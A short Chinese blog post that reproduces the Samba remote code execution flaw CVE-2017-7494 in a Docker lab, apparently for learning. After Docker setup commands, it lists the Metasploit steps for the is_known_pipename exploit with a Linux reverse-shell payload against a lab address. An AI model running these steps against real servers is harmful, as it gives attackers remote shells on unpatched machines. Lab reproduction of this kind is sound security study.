NEKO

Samba远程代码执行漏洞(CVE-2017-7494)复现

2018/03/08

docker安装:

1
2
3
4
5
6
7
8
9
10
# step 1: 安装必要的一些系统工具
sudo apt-get update
sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common
# step 2: 安装GPG证书
curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
# Step 3: 写入软件源信息
sudo add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"
# Step 4: 更新并安装 Docker-CE
sudo apt-get -y update
sudo apt-get -y install docker-ce

docker加速:
http://blog.csdn.net/bychahaha/article/details/52762675

docker命令:
https://www.cnblogs.com/go2bed/p/5703117.html

漏洞镜像及步骤:
https://github.com/Medicean/VulApps/tree/master/s/samba/1

msfconsole启动

步骤:

1
2
3
4
5
6
7
8
9
use exploit/linux/samba/is_known_pipename

set rhost 10.10.10.167

set target 3

set payload linux/x64/shell_reverse_tcp

run

停止运行中的容器:
sudo docker stop $(sudo docker ps -q)
删除容器:
sudo docker rm 64a
删除镜像:
sudo docker rmi fed1

原文作者: n3k0

发表日期: March 8th 2018, 1:36:11

发出嘶吼: 没有魔夜2玩我要死了

CATALOG